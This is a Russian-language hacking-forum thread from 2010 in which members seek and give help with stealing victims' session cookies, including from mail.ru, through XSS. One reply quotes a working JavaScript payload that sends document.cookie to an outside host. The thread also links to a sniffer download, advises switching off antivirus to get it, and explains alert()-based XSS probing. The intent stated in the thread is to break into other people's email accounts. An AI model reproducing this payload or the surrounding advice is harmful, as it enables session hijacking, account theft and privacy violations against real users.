 |
|

27.08.2010, 01:00
|
|
Постоянный
Регистрация: 30.05.2010
Сообщений: 350
С нами:
8396246
Репутация:
12
|
|
люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!
|
|
|

27.08.2010, 01:00
|
|
Участник форума
Регистрация: 18.08.2010
Сообщений: 156
С нами:
8281046
Репутация:
7
|
|
Цитата:
Сообщение от HEX xaKer
люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!
Советую посмотреть видео - http://depositfiles.com/ru/files/1p6w2m91m (Видео от "SOKOL) там все по сифферу,+ ответ и наглядный показ на твой ответ.
|
|
|

29.08.2010, 01:00
|
|
Участник форума
Регистрация: 28.08.2010
Сообщений: 186
С нами:
8266646
Репутация:
-1
|
|
Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.
Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.
И на счёт userhost не понял, какой-нибудь дайте для примера.
|
|
|

30.08.2010, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Цитата:
Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.
Все архивы в полном ажуре, не знаю у кого что битое. Говорят, некоторые авири уже на сам линк ругаются, отключаем, качаем, снова включаем если очень страшно xD
Цитата:
Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.
Цитата:
img = new Image(); img.src = "http://unet.phpnet.us/s/s.gif?"+document.cookie;
Всё наместе, даже выделил. Опять не знаю у кого что недописано.
Кстати, откудаж такие сведения, если архивы битые?
Цитата:
И на счёт userhost не понял, какой-нибудь дайте для примера.
Когда зальёшь сниффер на свой хостинг - вот URL-адрес твоего хоста тебе примером и будет))
|
|
|

15.09.2010, 01:00
|
|
Постоянный
Регистрация: 29.12.2009
Сообщений: 445
С нами:
8615126
Репутация:
11
|
|
можете разжевать?
Ужасна распрастраннёная узявимость типа
alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)
|
|
|

15.09.2010, 01:00
|
|
Участник форума
Регистрация: 05.04.2010
Сообщений: 162
С нами:
8475446
Репутация:
17
|
|
Цитата:
Сообщение от Shady3000rf
можете разжевать?
Ужасна распрастраннёная узявимость типа
alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)
НЕЕЕ, сообщение такого типа: IMAGE http://hacker-school.ucoz.ru/img/xss/1.png
ПОМОГ +
|
|
|

15.09.2010, 01:00
|
|
Постоянный
Регистрация: 29.12.2009
Сообщений: 445
С нами:
8615126
Репутация:
11
|
|
ага) эм а что там в этом сообщение должно быть написано? что типо этого нельзя написать или что?:realangel:
|
|
|

15.09.2010, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Shady3000rf, ничего не должно быть. Появление рамки сообщения (alert) свидетельствует о том, что код alert(); выполнился и есть XSS-уязвимость. (возможно внедрение другого произвольного кода)
|
|
|

29.09.2010, 01:00
|
|
Новичок
Регистрация: 10.03.2010
Сообщений: 1
С нами:
8512886
Репутация:
0
|
|
други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? или с любуго, который юзер посетил заранее? тоесть по сути, мне надо пароль с почты украсть допустим маил ру, мне надо именно пасивку или активку юзать маила ру, или любого другова сайта и если юзер раньше зашел на маил и потом прошел на сторонний мой сайт с XSS с смоим снифером я получу куки с маила ,или нет?
|
|
|

29.09.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Цитата:
Сообщение от SPA-MAS
други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS?
Да, и никак иначе
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|